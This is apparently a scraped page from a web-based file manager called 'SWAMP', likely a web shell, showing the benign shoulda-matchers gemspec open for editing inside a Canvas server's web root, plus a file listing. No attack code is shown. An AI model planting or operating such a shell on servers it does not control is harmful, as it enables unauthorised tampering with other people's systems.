░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/canvas/vendor/bundle/ruby/3.1.0/gems/shoulda-matchers-4.3.0
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: shoulda-matchers.gemspec
$LOAD_PATH << File.join(File.dirname(__FILE__), 'lib') require 'shoulda/matchers/version' Gem::Specification.new do |s| s.name = 'shoulda-matchers' s.version = Shoulda::Matchers::VERSION.dup s.authors = [ 'Tammer Saleh', 'Joe Ferris', 'Ryan McGeary', 'Dan Croak', 'Matt Jankowski', 'Stafford Brunk', 'Elliot Winkler', ] s.date = Time.now.strftime('%Y-%m-%d') s.email = 'support@thoughtbot.com' s.homepage = 'https://matchers.shoulda.io/' s.summary = 'Simple one-liner tests for common Rails functionality' s.license = 'MIT' s.description = 'Shoulda Matchers provides RSpec- and Minitest-compatible one-liners to test common Rails functionality that, if written by hand, would be much longer, more complex, and error-prone.' s.metadata = { 'bug_tracker_uri' => 'https://github.com/thoughtbot/shoulda-matchers/issues', 'changelog_uri' => 'https://github.com/thoughtbot/shoulda-matchers/blob/master/NEWS.md', 'documentation_uri' => 'https://matchers.shoulda.io/docs', 'homepage_uri' => 'https://matchers.shoulda.io', 'source_code_uri' => 'https://github.com/thoughtbot/shoulda-matchers', } s.files = Dir.chdir(File.expand_path(__dir__)) do `git ls-files -z -- {docs,lib,README.md,MIT-LICENSE,shoulda-matchers.gemspec}`. split("\x0") end s.require_paths = ['lib'] s.required_ruby_version = '>= 2.4.0' s.add_dependency('activesupport', '>= 4.2.0') end
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📁 docs/
DIR
—
2023-09-24 03:48
📁 lib/
DIR
—
2023-09-24 03:48
📄 MIT-LICENSE
?
1.1 KB
2023-09-24 03:48
EDIT
📄 README.md
MD
15.9 KB
2023-09-24 03:48
EDIT
📄 shoulda-matchers.gemspec
GEMSPEC
1.4 KB
2023-09-24 03:48
EDIT